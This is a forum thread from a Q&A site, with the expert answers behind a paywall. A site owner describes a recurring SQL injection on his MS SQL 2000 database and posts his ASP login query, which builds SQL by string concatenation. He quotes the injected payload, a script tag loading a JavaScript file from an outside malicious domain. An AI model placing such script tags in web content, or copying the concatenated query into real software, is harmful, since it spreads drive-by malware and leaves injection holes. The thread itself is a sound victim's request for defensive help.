Aleks
asked on
SQL Injection
I am having a problem with my database, somehow somone is altering the data in my database, i talked to the IT staff and they say it might be an SQL injection. It alters all the records in one table adding some junk code, like:
so if the value before was 'aleks', after the injection it is 'aleks<script src=http://www.bnrupdate.mobi/b.js></script>'
Have you seen this before ? Sometimes its code from google analytics, etc. It is driving me crazy not to mention a security risk. how can I track down when and who is doing this and how to prevent this from happening again ?
This is a web application with limited users, everything (web forms, etc) is behind a username/password protected area. nothing is open to the public. I am using MS SQL 2000.
Any pointers are appreciated, this is a big concern for me at this moment. And I am willing to pretty much try everything that could help. But if there is a way to get the person doing this i am willing to setup a 'trap' to get his IP or whatever.
Aleks
so if the value before was 'aleks', after the injection it is 'aleks<script src=http://www.bnrupdate.mobi/b.js></script>'
Have you seen this before ? Sometimes its code from google analytics, etc. It is driving me crazy not to mention a security risk. how can I track down when and who is doing this and how to prevent this from happening again ?
This is a web application with limited users, everything (web forms, etc) is behind a username/password protected area. nothing is open to the public. I am using MS SQL 2000.
Any pointers are appreciated, this is a big concern for me at this moment. And I am willing to pretty much try everything that could help. But if there is a way to get the person doing this i am willing to setup a 'trap' to get his IP or whatever.
Aleks
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
So, for them to do this do they need to type ' (quotes) in the password field ?
If I don't allow such character in ANY field in my entire system, would this prevent future injections ?
If I don't allow such character in ANY field in my entire system, would this prevent future injections ?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
What do you mean 'escape' ?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Ok, let me get this straight.
1. I am being attacked by someone entering code in the fields where for example username or password should be?
2. If I dont allow apostrophe or replace it in either field they should no longer be able to enter the code to attack me. Correct ?
1. I am being attacked by someone entering code in the fields where for example username or password should be?
2. If I dont allow apostrophe or replace it in either field they should no longer be able to enter the code to attack me. Correct ?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
This is the query for my login page, which is the only form outside of the password protected area.
<%
var EmployeeLogin__usxusername = "%";
if (String(Request.Form("txtu sername")) != "undefined" &&
String(Request.Form("txtus ername")) != "") {
EmployeeLogin__usxusername = String(Request.Form("txtus ername"));
}
%>
<%
var EmployeeLogin__usxpassword = "%";
if (String(Request.Form("txtp assword")) != "undefined" &&
String(Request.Form("txtpa ssword")) != "") {
EmployeeLogin__usxpassword = String(Request.Form("txtpa ssword"));
}
%>
<%
var EmployeeLogin = Server.CreateObject("ADODB .Recordset ");
EmployeeLogin.ActiveConnec tion = MM_AAA_STRING;
EmployeeLogin.Source = "select * from dbo.vulogdtls WHERE Loginid = '"+ EmployeeLogin__usxusername .replace(/ '/g, "''") + "' AND Password = '"+ EmployeeLogin__usxpassword .replace(/ '/g, "''") + "' AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
EmployeeLogin.CursorType = 0;
EmployeeLogin.CursorLocati on = 2;
EmployeeLogin.LockType = 1;
EmployeeLogin.Open();
var EmployeeLogin_numRows = 0;
%>
Would that query have any problem and be potentially unsafe ? Or is it OK. !
I can't seem to find anythign that is causing data to be inputed into my database, this is really becoming a very stressful experience.
Are there any specific recommendations that anyone can make ? I know reading articles helps but wont be something that will immediately and possibly stop the attacks. For example: Change your IP would be a good recommendation.
I heard that from someone, do you think this would help ?
Are there other specific recommendations you could offer to help prevent attacks ?
How about if its not from the outside but a file or script already in the server, is this a possibility ? or content in the database that resides there and adds the data .. is this another possibility ?
A
<%
var EmployeeLogin__usxusername
if (String(Request.Form("txtu
String(Request.Form("txtus
EmployeeLogin__usxusername
}
%>
<%
var EmployeeLogin__usxpassword
if (String(Request.Form("txtp
String(Request.Form("txtpa
EmployeeLogin__usxpassword
}
%>
<%
var EmployeeLogin = Server.CreateObject("ADODB
EmployeeLogin.ActiveConnec
EmployeeLogin.Source = "select * from dbo.vulogdtls WHERE Loginid = '"+ EmployeeLogin__usxusername
EmployeeLogin.CursorType = 0;
EmployeeLogin.CursorLocati
EmployeeLogin.LockType = 1;
EmployeeLogin.Open();
var EmployeeLogin_numRows = 0;
%>
Would that query have any problem and be potentially unsafe ? Or is it OK. !
I can't seem to find anythign that is causing data to be inputed into my database, this is really becoming a very stressful experience.
Are there any specific recommendations that anyone can make ? I know reading articles helps but wont be something that will immediately and possibly stop the attacks. For example: Change your IP would be a good recommendation.
I heard that from someone, do you think this would help ?
Are there other specific recommendations you could offer to help prevent attacks ?
How about if its not from the outside but a file or script already in the server, is this a possibility ? or content in the database that resides there and adds the data .. is this another possibility ?
A
ASKER
Also, is there a possibility this is not an sql injection and instead some malicious script already residing in the server ? if this is the case, what would be the best course of action ?
Or is there a chance the script is inside the database ?
Or is there a chance the script is inside the database ?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Thank you, this is very useful. I will look into this tools.
Aleks
Aleks
ASKER
I am sorry its taken long for me to respond but I have been busy learning and implementing the sql fixes.
The thing is last night i stopped my website from IIS. no web access. I cleaned up my database skeeque clean ... midnight ... went to sleep. Woke up and checked my database .. all injected, same code all over different tables (Same tables) and mostly on 'text' fields.
So .. how could someone inject information into my database while the website is down, my understanding is that they do it through the web pages by entering code and submitting the form to run it, if there is no form how in the world did my database got this code ?
I checked for viruses and adware/malware ... nothing in the server. It is sql 2000 with service pack 4 and all patched up to the neck .. dont know what else to do.
My DB person told me to run profiler on the sql so we can see what happens overnight. Any other ideas ? it would sound like a worm that is in the database, but then again i know nothing about this things, i am losing my faith and my whole business depends on this database :(
The thing is last night i stopped my website from IIS. no web access. I cleaned up my database skeeque clean ... midnight ... went to sleep. Woke up and checked my database .. all injected, same code all over different tables (Same tables) and mostly on 'text' fields.
So .. how could someone inject information into my database while the website is down, my understanding is that they do it through the web pages by entering code and submitting the form to run it, if there is no form how in the world did my database got this code ?
I checked for viruses and adware/malware ... nothing in the server. It is sql 2000 with service pack 4 and all patched up to the neck .. dont know what else to do.
My DB person told me to run profiler on the sql so we can see what happens overnight. Any other ideas ? it would sound like a worm that is in the database, but then again i know nothing about this things, i am losing my faith and my whole business depends on this database :(
ASKER
BTW. I already changed all server passwords, database passwords, ODBC passwords, I assigned a new IP, a new domain name ... and still got the code inserted into my database, all while the website that connects to the database was down.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
>>better still would be to use parameterized queiries <<
Very good advice. :)
Very good advice. :)
ASKER
Any other character that would be a big no no ?